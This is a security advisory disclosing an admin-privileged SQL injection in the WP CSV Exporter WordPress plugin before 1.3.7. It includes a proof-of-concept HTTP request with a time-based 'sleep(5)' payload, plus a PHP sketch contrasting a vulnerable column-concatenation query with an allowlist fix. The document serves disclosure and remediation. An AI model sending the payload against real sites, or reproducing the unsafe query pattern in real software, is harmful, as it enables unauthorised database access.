wpvulndb | Asif Nawaz Minhas | WPVDB-ID: 6503DA78-A2BF-4B4C-B56D-21C8C55B076E
Published: Nov 09, 2022 - 12:00 a.m.

WP CSV Exporter < 1.3.7 - Admin+ SQLi

2022-11-09 00:00:00
Asif Nawaz Minhas
wpscan.com
9
wordpress
csv exporter
sql injection

EPSS

0.001

Percentile

37.9%

The plugin does not properly sanitise and escape some parameters before using them in a SQL statement, allowing high-privilege users such as admins to perform SQL injection attacks.

PoC

As an admin, go to Tools > CSV Export, leave everything at its defaults and click on Export POSTS CSV. Intercept the request that is made and change posts_values%5B%5D=post_name to posts_values%5B%5D=post_name%2c(select*from(select(sleep(5)))a). This delays the response by 5s.

Raw request:

POST /wp-content/plugins/wp-csv-exporter/admin/download.php HTTP/1.1
Cookie: [admin+]
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 272
Upgrade-Insecure-Requests: 1
Connection: close

_wpnonce=7d0447e58b&post_id=post_id&type=post&posts_values%5B%5D=post_name%2c(select*from(select(sleep(5)))a)&posts_values%5B%5D=7*7&posts_values%5B%5D=post_content&post_status%5B%5D=publish&limit=0&offset=0&order_by=DESC&post_date_from=&post_date_to=&post_modified_from=&post_modified_to=&string_code=UTF-8
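The root cause described above is that the requested column names (posts_values[]) are placed into the SELECT list as-is. Prepared-statement placeholders cannot protect identifiers, so the fix is an allowlist. The following PHP is an added illustration written for this page, not the plugin's own code; the column list and the wp_posts table name are assumptions, and the hostile input is constructed from the request shown above.

```php
<?php
// Added illustration, not the plugin's code. Column names reach the query as
// $_POST['posts_values'][]; placeholders cannot quote identifiers, so a fixed
// allowlist of wp_posts columns (assumed list) is the control.

const ALLOWED_POST_COLUMNS = [
    'ID', 'post_author', 'post_date', 'post_title', 'post_name',
    'post_content', 'post_excerpt', 'post_status', 'post_type', 'post_modified',
];

// Vulnerable pattern: whatever the browser sent becomes part of the SELECT
// list, so "post_name,(select ...)a" is executed as SQL instead of rejected.
function build_export_query_unsafe(array $requested): string
{
    return 'SELECT ' . implode(', ', $requested) . ' FROM wp_posts';
}

// Hardened pattern: every requested name must be a string that matches an
// allowlisted column exactly (no expressions, no duplicates), then is quoted.
function build_export_query_safe(array $requested): string
{
    if ($requested === []) {
        throw new InvalidArgumentException('no columns requested');
    }
    $columns = [];
    foreach ($requested as $name) {
        if (!is_string($name)) {
            throw new InvalidArgumentException('column name must be a string');
        }
        if (!in_array($name, ALLOWED_POST_COLUMNS, true)) {
            throw new InvalidArgumentException('column not allowed: ' . $name);
        }
        $columns['`' . $name . '`'] = true; // dedupe while keeping order
    }
    return 'SELECT ' . implode(', ', array_keys($columns)) . ' FROM wp_posts';
}

// Constructed input mirroring the advisory's request (first value is hostile).
$from_request = ['post_name,(select*from(select(sleep(5)))a)', '7*7', 'post_content'];

echo build_export_query_unsafe($from_request), PHP_EOL;   // injected SQL goes through
try {
    echo build_export_query_safe($from_request), PHP_EOL;
} catch (InvalidArgumentException $e) {
    echo 'rejected: ', $e->getMessage(), PHP_EOL;          // request is refused
}
echo build_export_query_safe(['post_name', 'post_content']), PHP_EOL;
```

Logging the rejection (with the offending value) gives a detection signal for this class of request, since a legitimate export never sends anything but plain column names.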
